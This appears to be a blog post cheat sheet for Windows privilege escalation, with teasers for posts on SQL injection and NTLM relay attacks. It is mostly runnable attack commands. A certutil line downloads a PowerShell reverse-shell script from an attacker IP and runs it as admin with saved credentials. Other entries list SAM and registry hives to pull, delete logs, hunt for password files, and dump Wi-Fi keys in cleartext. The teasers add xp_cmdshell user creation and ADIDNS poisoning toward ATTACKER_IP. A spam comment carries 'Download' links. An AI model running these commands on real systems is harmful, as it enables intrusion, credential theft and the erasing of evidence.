cd C:\Users\security\AppData\Local\Temp\

certutil -f split -urlcache http://10.10.14.2:8001/Invoke_powershellTcp.ps1


Run As Admin:
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"

nc nvlp 9001


Files

type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts

Files to Pull

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts

Host Information

systeminfo
driverquery
tasklist
fsutil fsinfo drives
set
qwinsta
net time
net file
net session
net use
If you are looking for kernal exploit targets, you can try using findstr like so…
driverquery | findstr Kernel
Query a specific service:
sc query <SERVICE NAME>
Start a service:
sc start <SERVICE NAME>
Stop a service:
sc stop <SERVICE NAME>

Kill a Task

taskkill f /pid 1337

List System Logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g *pass)

dir /s *pass* == *key* == *vnc* == *.config*
The above also looks for key, vnc and config.
Only in certain files…
findstr /si pass *.xml *.ini *.txt

WiFi Clear Text Passwords

Find AP SSID
netsh wlan show profile
Get Cleartext Pass
netsh wlan show profile <SSID> key=clear
Labels:

Comments

  1. AnonymousApril 20, 2022 at 1:37 AM

    Windows Priv Escallation >>>>> Download Now

    >>>>> Download Full

    Windows Priv Escallation >>>>> Download LINK

    >>>>> Download Now

    Windows Priv Escallation >>>>> Download Full

    >>>>> Download LINK O9

    ReplyDelete

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more